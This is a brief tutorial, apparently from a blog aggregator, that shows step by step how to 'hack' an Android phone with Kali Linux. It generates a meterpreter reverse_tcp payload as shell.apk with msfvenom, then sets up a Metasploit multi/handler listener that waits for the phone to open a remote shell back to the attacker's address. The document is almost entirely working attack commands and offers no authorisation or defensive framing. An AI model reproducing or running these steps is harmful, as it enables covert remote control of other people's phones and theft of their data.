Hack android phone with kali linux

1 ifconfig

type
$ ifconfig
to get ip address,example 192.168.0.113

2 msfvenom

type
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.113 LPORT=4444 R > shell.apk
to generate the shell.apk

3 msfconsole

type

$ msfconsole
$ use exploit/multi/handler
$set payload android/meterpreter/reverse_tcp
$set LHOST 192.168.0.113
$set LPORT 4444

4 exploit

type
exploit
and all is done.

你可能感兴趣的:(Hack android phone with kali linux)